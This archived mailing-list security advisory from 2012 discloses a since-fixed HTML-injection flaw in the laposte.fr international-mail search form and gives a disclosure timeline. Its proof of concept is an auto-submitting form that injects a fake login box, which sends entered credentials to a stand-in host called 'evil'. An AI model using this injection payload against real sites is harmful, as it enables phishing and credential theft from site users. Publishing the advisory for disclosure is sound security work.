lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 5 Dec 2012 16:05:37 +0100 From: Emmanuel FARCY <manu.farcy@...il.com> To: Bugtrack <bugtraq@...urityfocus.com>, Full Disclosure <full-disclosure@...ts.grok.org.uk> Subject: XSS vulnerability on laposte.fr Website: laposte.fr Version: - Enterprise website:http://www.laposte.fr Status: fixed Level: Low ========= Description ========= La Poste is the main french firm mail services. ========= Details ========= The search form in international posting section is vulnerable to XSS vulnerability: http://www.laposte.fr/courrierinternational/index.php?id=416 Due to an improper sanitization, search field can be used with an XSS attack. Javascript is correcly filtered, but HTML Tag not. ========= Example ========= A forged email can be send like that: <html> <form name="hahaha" method="post" action="http://www.laposte.fr/courrierinternational/index.php?id=416"> <input name="tx_indexedsearch[sword]" id="rechercheAv" value='"></form><br><br><form method="post" action="http://evil/getcredentials.php"><div class="formLog"><fieldset class="fieldsetForm"><legend>Veuillez Vous identifier</legend><label for="login" class="navCachee">Identifiant</label><input type="text" name="user" id="login" value="Email" class="inputSmall"/><br /><label for="password" class="navCachee">Mot de passe</label><input value="mot de passe" type="password"/><br /><input type="submit" id="ok" name="submit" value="Se connecter" class="buttonSmall" /></form><!--' class="input" type="hidden" /> </form> <script> document.hahaha.submit(); </script> </html> Timeline ========= 09/10/2012: bug report with POC 02/11/2012: Vulnerability fixed after several email because they didn't understand the risk (This a POST parameter, how can I be vulnerable, evil must be behind the victim!) 05/12/2012: Advisory published _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists